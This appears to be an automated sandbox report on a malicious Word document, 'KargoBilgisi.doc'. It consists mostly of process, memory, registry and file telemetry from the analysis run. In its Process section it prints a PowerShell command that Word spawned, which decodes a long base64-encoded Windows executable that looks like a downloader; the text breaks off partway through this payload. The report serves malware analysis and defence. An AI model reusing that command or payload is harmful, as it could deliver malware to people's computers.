a2cdac363d6497bba4790ac8b56664c9f8f07903583ac63b5f75419095cb103a (SHA256)
KargoBilgisi.doc
Word Document
Created at 2018-10-09 05:29:00
Notifications (2/2)
The overall sleep time of all monitored processes was truncated from "30 seconds" to "10 seconds" to reveal dormant functionality.
The operating system was rebooted during the analysis.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
248
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:30, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:27, Reason: Self Terminated |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x900 |
| Parent PID | 0x4f8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9C4
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
928
0x
924
0x
918
0x
914
0x
90C
0x
908
0x
904
0x
A18
0x
A1C
0x
C00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x00360fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00447fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00550fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00561fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x00579fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x0066efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00691fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x006a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x00730fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x009effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x00aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000af0000 | 0x00af0000 | 0x00af6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b00000 | 0x00b00000 | 0x00b01fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b10000 | 0x00b10000 | 0x00b10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c20000 | 0x00c20000 | 0x00c20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00c33fff | Pagefile Backed Memory | rw |
|
|
|
- |
| winword.exe | 0x00c40000 | 0x00e16fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000e20000 | 0x00e20000 | 0x01a1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01a20000 | 0x01ceefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01cf0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01d00fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001d10000 | 0x01d10000 | 0x01d11fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d20000 | 0x01d20000 | 0x01d20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x01d30fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml6r.dll | 0x01d40000 | 0x01d40fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001d50000 | 0x01d50000 | 0x01d50fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d6ffff | Private Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x01d70000 | 0x01d8ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d90000 | 0x01d90000 | 0x01e8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e90000 | 0x01e90000 | 0x02282fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002290000 | 0x02290000 | 0x0230ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002310000 | 0x02310000 | 0x0240ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002560000 | 0x02560000 | 0x0259ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x025a0000 | 0x0261efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002620000 | 0x02620000 | 0x0262ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x0266ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002670000 | 0x02670000 | 0x02670fff | Private Memory | rw |
|
|
|
- |
| c_1255.nls | 0x02680000 | 0x02690fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x0270ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x0281ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000029b0000 | 0x029b0000 | 0x031affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000031b0000 | 0x031b0000 | 0x033affff | Private Memory | rw |
|
|
|
- |
| staticcache.dat | 0x033b0000 | 0x03cdffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003ce0000 | 0x03ce0000 | 0x03ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003de0000 | 0x03de0000 | 0x03deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003e70000 | 0x03e70000 | 0x03eaffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000003eb0000 | 0x03eb0000 | 0x046affff | Pagefile Backed Memory | rw |
|
|
|
- |
| gdipfontcachev1.dat | 0x046b0000 | 0x046cbfff | Memory Mapped File | rw |
|
|
|
|
| private_0x00000000046e0000 | 0x046e0000 | 0x047dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004820000 | 0x04820000 | 0x0491ffff | Private Memory | rw |
|
|
|
- |
| tahoma.ttf | 0x04920000 | 0x049cafff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x04acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ad0000 | 0x04ad0000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x04bd0000 | 0x04c8ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| arial.ttf | 0x04e70000 | 0x04f2cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f40000 | 0x04f40000 | 0x0503ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005040000 | 0x05040000 | 0x0543ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000005440000 | 0x05440000 | 0x0563ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005640000 | 0x05640000 | 0x05710fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000057a0000 | 0x057a0000 | 0x057dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005950000 | 0x05950000 | 0x0598ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005990000 | 0x05990000 | 0x05d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d90000 | 0x05d90000 | 0x06190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000061a0000 | 0x061a0000 | 0x065a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000065b0000 | 0x065b0000 | 0x069b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000069c0000 | 0x069c0000 | 0x06dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037170000 | 0x37170000 | 0x3717ffff | Private Memory | rwx |
|
|
|
- |
| wwlib.dll | 0x63970000 | 0x64e2bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x654c0000 | 0x65539fff | Memory Mapped File | rwx |
|
|
|
- |
| oart.dll | 0x65540000 | 0x662e7fff | Memory Mapped File | rwx |
|
|
|
- |
| dwrite.dll | 0x664a0000 | 0x665a9fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10warp.dll | 0x665b0000 | 0x666dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wwintl.dll | 0x666e0000 | 0x6679ffff | Memory Mapped File | rwx |
|
|
|
- |
| msohev.dll | 0x667b0000 | 0x667c4fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d11.dll | 0x667d0000 | 0x66852fff | Memory Mapped File | rwx |
|
|
|
- |
| osppc.dll | 0x66880000 | 0x668acfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x66bc0000 | 0x66c09fff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x67300000 | 0x6bfeafff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x6bff0000 | 0x6d8d3fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x6e8d0000 | 0x6ea5dfff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x6ea60000 | 0x6edd0fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x6f100000 | 0x6f257fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x6fd30000 | 0x6fd7efff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x6fd80000 | 0x6fdd7fff | Memory Mapped File | rwx |
|
|
|
- |
| msptls.dll | 0x709a0000 | 0x70ab5fff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x70ac0000 | 0x70b74fff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x70b80000 | 0x70c39fff | Memory Mapped File | rwx |
|
|
|
- |
| office.odf | 0x716e0000 | 0x71bdffff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x71be0000 | 0x71e1ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x71e50000 | 0x71eb8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x71ec0000 | 0x71f7efff | Memory Mapped File | rwx |
|
|
|
- |
| dxgi.dll | 0x723c0000 | 0x72442fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10_1core.dll | 0x72450000 | 0x72489fff | Memory Mapped File | rwx |
|
|
|
- |
| d3d10_1.dll | 0x72490000 | 0x724bbfff | Memory Mapped File | rwx |
|
|
|
- |
| msimg32.dll | 0x729a0000 | 0x729a4fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74370000 | 0x7437cfff | Memory Mapped File | rwx |
|
|
|
- |
| windowscodecs.dll | 0x74390000 | 0x7448afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x74660000 | 0x747effff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x758a0000 | 0x758a7fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x75950000 | 0x75978fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75980000 | 0x7598dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x75c60000 | 0x75c8cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 139 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\gdipfontcachev1.dat | 108.91 KB |
MD5:
945637b742f52d1299ae49ca23a8312f
SHA1: edc6dcab8d0a9639f24de8f3527f1ca35f57cbdd SHA256: 10701ed1bb54a7be4cb0321d9a1e0b143896685cdba6b5400bfe8457d4ee2a69 SSDeep: 1536:746D5oHgTFWQpBaDBsDV3bTyuuZzER8kTF:746KQpgDBsRuX4 |
|
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WScript.Shell | IUnknown | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
Registry (48)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\Licenses | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\409 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\9 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win32 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 | - |
|
2 | |
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32 | - |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = RequireDeclaration, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = CompileOnDemand, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = NotifyUserBeforeStateLoss, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BackGroundCompile, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnAllErrors, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common | value_name = BreakOnServerErrors, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win32 | data = C:\Program Files\Microsoft Office\Office15\MSWORD.OLB |
|
2 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32 | data = C:\Windows\system32\stdole2.tlb |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win32 | data = C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} | - |
|
1 | |
| Enumerate Keys | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | powershell.exe /c [Byte[]]$code_ = [System.Convert]::FromBase64String('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BAAAAPYClwAAAJ8DmwAAALAAoAAAALAEpQACAAEAAwABAAIAAwACAAYABQACAAcABwABAAgABwACAAkACQAEgAAAAQAAAAAAAAAAAAAAAAAaAAAAAgAAAAAAAAAAAAAAXQAKAAAAAAACAAAAAAAAAAAAAABdAB0DAAAAAAAAAAABAAAANwQAAAAAAAAAPE1vZHVsZT4AbXNjb3JsaWIAVGhyZWFkAERvd25sb2FkAFN5bmNocm9uaXplZAA8RGVzdFBhdGg+a19fQmFja2luZ0ZpZWxkAGRlZmF1bHRJbnN0YW5jZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBEb3dubG9hZEZpbGUAVHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAU1RBVGhyZWFkQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5